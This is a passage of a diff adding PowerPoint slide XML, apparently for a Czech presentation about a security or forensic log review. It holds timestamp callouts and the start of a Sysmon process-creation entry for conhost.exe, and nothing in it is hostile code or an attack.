+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>20:43</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="25" name="Řečová bublina: obdélníkový bublinový popisek 24">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645B26E6-8026-4C95-A7AA-B316D991D92B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="7982331" y="1598526"/>
+            <a:ext cx="720852" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>17:00</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="26" name="Řečová bublina: obdélníkový bublinový popisek 25">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{144A20DB-8A17-4BC8-AA49-A80880248017}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="9180576" y="1581738"/>
+            <a:ext cx="766572" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>19:42</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="27" name="Řečová bublina: obdélníkový bublinový popisek 26">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458E0478-44C0-459E-B4E6-07BC498D045E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3056001" y="1589744"/>
+            <a:ext cx="720852" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>21:14</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="28" name="Řečová bublina: obdélníkový bublinový popisek 27">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BD3648A-4338-4D5B-943C-3F9E505568AC}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5223129" y="2625827"/>
+            <a:ext cx="720852" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>00:52</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="29" name="Řečová bublina: obdélníkový bublinový popisek 28">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3470220-5AB9-4F7B-A62C-318D0C81DABA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6628257" y="2625827"/>
+            <a:ext cx="720852" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>12:41</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="30" name="Řečová bublina: obdélníkový bublinový popisek 29">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E84E99F-7A58-46AD-860B-EB2D3CFBC53F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="9180576" y="2696881"/>
+            <a:ext cx="766572" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>19:42</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="31" name="Řečová bublina: obdélníkový bublinový popisek 30">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A13280FD-A63B-4981-9B99-0674B94D1436}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10232136" y="1545311"/>
+            <a:ext cx="766572" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>20:43</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="32" name="Řečová bublina: obdélníkový bublinový popisek 31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32A4176-A206-4F36-B249-060F6DCFEF46}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10202418" y="2688810"/>
+            <a:ext cx="766572" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>20:43</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="33" name="Řečová bublina: obdélníkový bublinový popisek 32">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99AB419D-26B2-4C24-AA70-04F0385CC27E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="10202418" y="3711241"/>
+            <a:ext cx="766572" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>20:43</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="34" name="Řečová bublina: obdélníkový bublinový popisek 33">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2BFC140-00CB-4ABC-AE3A-CCBBEFB8B2D6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4816983" y="3759257"/>
+            <a:ext cx="766572" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>23:47</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="35" name="Řečová bublina: obdélníkový bublinový popisek 34">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98420A95-6DF5-4347-90DE-DFEDD1B77741}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6096000" y="3753537"/>
+            <a:ext cx="766572" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>08:15</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="36" name="Řečová bublina: obdélníkový bublinový popisek 35">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E2BCF6-CCC7-4766-B6F3-9DAB9079D22B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="7530084" y="3753537"/>
+            <a:ext cx="766572" cy="524306"/>
+          </a:xfrm>
+          <a:prstGeom prst="wedgeRectCallout">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="30ACEC"/>
+          </a:solidFill>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>14:03</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="39" name="Obrázek 38">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5423985B-0E00-4E2B-9BD4-F05F0DA3A63C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="121693" y="6073487"/>
+            <a:ext cx="4629796" cy="581106"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4010309957"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="Obdélník 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1580769" y="982176"/>
+            <a:ext cx="10515600" cy="4893647"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>"Process Create:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>RuleName</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>UtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: 2019-03-26 21:14:44.276</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Image: C:\Windows\System32\conhost.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>FileVersion</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: 10.0.17134.1 (WinBuild.160101.0800)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Description: Console Window Host</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Product: Microsoft? Windows? Operating System</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Company: Microsoft Corporation</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>CommandLine</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: \??\C:\WINDOWS\system32\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>conhost.exe 0xffffffff -ForceV1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
